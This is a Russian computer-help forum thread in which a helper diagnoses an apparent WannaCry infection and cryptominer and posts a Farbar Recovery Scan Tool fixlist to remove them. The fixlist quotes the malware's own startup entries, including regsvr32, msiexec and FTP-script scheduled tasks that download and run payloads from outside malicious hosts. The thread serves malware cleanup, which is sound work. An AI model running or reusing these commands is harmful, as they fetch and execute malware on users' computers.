• Добро пожаловать на компьютерный форум Tehnari.ru. Здесь разбираемся с проблемами ПК и ноутбуков: Windows, драйверы, «железо», сборка и апгрейд, софт и безопасность. Форум работает много лет, сейчас он переехал на новый движок, но старые темы и аккаунты мы постарались сохранить максимально аккуратно.

    Форум не связан с магазинами и сервисами – мы ничего не продаём и не даём «рекламу под видом совета». Отвечают обычные участники и модераторы, которые следят за порядком и качеством подсказок.

    Если вы у нас впервые, загляните на страницу о форуме и правила – там коротко описано, как задать вопрос так, чтобы быстро получить ответ. Чтобы создавать темы и писать сообщения, сначала зарегистрируйтесь, а затем войдите под своим логином.

    Не знаете, с чего начать? Создайте тему с описанием проблемы – подскажем и при необходимости перенесём её в подходящий раздел.
    Задать вопрос Новые сообщения Как правильно спросить
    Если пришли по старой ссылке со старого Tehnari.ru – вы на нужном месте, просто продолжайте обсуждение.

Кажется, завелся вирус: ЦП 100%, выключается диспетчер

  • Автор темы Автор темы Snuff
  • Дата начала Дата начала
Новые логи FRST.txt, Addition.txt сделайте
 
У вас WannaCry вроде завелся.


Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Код: 
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.5b6b7b.ru:280/v.sct scrobj.dll <==== ATTENTION
HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.5b6b7b.ru:280/helloworld.msi /q <==== ATTENTION
S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
2018-05-06 01:13 - 2018-05-06 01:13 - 002281472 ____S C:\Windows\mssecsvr.exe
2018-05-05 22:12 - 2018-05-06 17:53 - 003514368 ____S C:\Windows\tasksche.exe
2018-05-05 22:12 - 2018-05-06 17:53 - 002061938 ____S C:\Windows\qeriuwjhrf
Task: {4A570A66-A26A-4432-8974-C61DDC7D2282} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {5DFF2345-F703-409E-9A0A-CE832B80DBCE} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {7EB8FD13-5936-425D-9C41-D0983EFC878A} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0118.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {CE31254C-EE60-40B8-AA98-7062A326D0A6} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe <==== ATTENTION
Task: {EB8B1D40-ABD4-48A2-A6CB-FFC5C8163C14} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0118.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
2018-05-06 01:13 - 2018-05-06 01:13 - 002281472 ____S () C:\WINDOWS\mssecsvr.exe
2018-05-05 11:59 - 2018-05-05 20:59 - 003387392 _____ () c:\windows\debug\lsmose.exe
2018-04-14 03:19 - 2018-04-14 03:20 - 006105600 _____ () c:\windows\debug\xmrstak_cuda_backend.dll
AlternateDataStreams: C:\ProgramData\TEMP:D8999815 [200]
AlternateDataStreams: C:\Users\Все пользователи\TEMP:D8999815 [200]
EmptyTemp:
Reboot:

Скачайте и установите обновление KB4012212

Код: 
Устройство: \Device\RaidPort0
Модель: WDC WD5000AAKS-00V1A0
Версия микропрограмм: 05.0
Серийный номер:      WD-WCAWF0470547
Порт: 1
Error: (05/10/2018 08:00:44 PM) (Source: nvstor64) (EventID: 3) (User: )
Description: Ошибка данных в устройстве.
У вас Raid массив? На ошибки диски проверьте. А также в каком режиме передачи они находятся


П.С.
mike_1 извени что влез
 
Гризлик написал(а):
Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Нажмите для раскрытия...
прикрепил

Гризлик написал(а):
Скачайте и установите обновление KB4012212
Нажмите для раскрытия...
сделал
Гризлик написал(а):
У вас Raid массив?
Нажмите для раскрытия...
нет, стоит SSD ADATA SP 550 SCSI Disk Device (223 ГБ) на нем система и некоторые игры
и полудохлый HDD WDC WD50 00AAKS-00V1A SCSI Disk Device (500 ГБ, 7200 RPM, SATA-II) разбитый на 2 раздела
Гризлик написал(а):
На ошибки диски проверьте. А также в каком режиме передачи они находятся
Нажмите для раскрытия...
можно поподробней
 

Вложения

А с дипетчером как дела?
Snuff написал(а):
HDD WDC WD50 00AAKS-00V1A
Нажмите для раскрытия...
Ну в логах я так понимаю речь про него идет. Его на ошибки проверьте. И посмотрите в каком режиме передачи он стоит/ Не PIO случаем?
 

Вложения

  • dma-mode.gif
    dma-mode.gif
    35.5 KB · Просмотры: 125
Гризлик написал(а):
А с дипетчером как дела?
Нажмите для раскрытия...
ну пока непонятно, по кайней мере до 100 не подскакивает теперь вроде
Гризлик написал(а):
Его на ошибки проверьте
Нажмите для раскрытия...
викой? из под винды же можно? система на другом стоит

Гризлик написал(а):
И посмотрите в каком режиме передачи он стоит/ Не PIO случаем?
Нажмите для раскрытия...
DMA
 

Вложения

  • итьитьить.png.webp
    итьитьить.png.webp
    42.3 KB · Просмотры: 176
Гризлик написал(а):
Да........
Нажмите для раскрытия...
чет долго.. расчетное время 6ч на проверку... пока 17% всего 4 зеленых, красных и оранжевых нету, бедов тоже пока нету
я наверное сейчас вырублю, на ночь поставлю, может сразу поставить чтобы она их лечила? что поставить Remap или Restore ?
 

Вложения

  • тмит.png.webp
    тмит.png.webp
    71.3 KB · Просмотры: 113
Ну а основная проблема не проявлялась еще? И с видеокартой как?
 
Может и ошибаюсь.
Но вам сказочно повезло. Из-за сбоя в системе у вас не смог запуститься шифровальщик.:)
Иначе последствия были бы печальны.
Код: 
Error: (05/11/2018 10:39:22 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Сбой при запуске службы "Microsoft Security Center (2.0) Service" из-за ошибки 
Не удается найти указанный файл.

==================
Error: (05/10/2018 04:04:55 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Ошибка создания контекста архивации для "c:\Windows\tasksche.exe". Ошибка в файле манифеста или политики "c:\Windows\tasksche.exe" в строке 0.
Синтаксическая ошибка в XML.
 
Гризлик написал(а):
Может и ошибаюсь.
Но вам сказочно повезло. Из-за сбоя в системе у вас не смог запуститься шифровальщик.
Нажмите для раскрытия...
ха, нормально. "настолько фейл, что даже вин" типо этого да? хехе
Гризлик написал(а):
Иначе последствия были бы печальны.
Нажмите для раскрытия...
ну это да, как я знаю, он всю инфу на компе блочит.. если честно даже не представляю как он попал ко мне
 
Snuff написал(а):
ну это да, как я знаю, он всю инфу на компе блочит.. если честно даже не представляю как он попал ко мне
Нажмите для раскрытия...
Ну если продолжать работать без нормального антивируса в системе, ещё много чего не сможете представитьtehno001
 

Вложения

  • Screenshot_14.png.webp
    Screenshot_14.png.webp
    116.8 KB · Просмотры: 157
  • Screenshot_15.png.webp
    Screenshot_15.png.webp
    91.3 KB · Просмотры: 150
Snuff написал(а):
ха, нормально. "настолько фейл, что даже вин" типо этого да? хехе
Нажмите для раскрытия...
Ну да служба Microsoft Security Center (2.0) Service в вашем случае это фейк.
Snuff написал(а):
он всю инфу на компе блочит..
Нажмите для раскрытия...
картинки, фотки, офисные файлы восновном. Шансы на восстановление откровенно говоря слабые. Даже если и заплатить злоумышленику
 
опять что-то непонятное...
переодически замечаю как на рабочем столе обновляются все иконки
есть малозаметные подлагивания
прога GIMP2 граф. редактор, после закрытия, остаются открыты инструменты какоето время и потом закрываются, такого небыло
 
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Snuff
Аппаратная ошибка видео
2
Ответы
30
Просмотры
8K
WHS
WHS
Snuff
  • Закрыта
Вирусы? Железо?
2
Ответы
24
Просмотры
2K
Snuff
Snuff
Назад
Сверху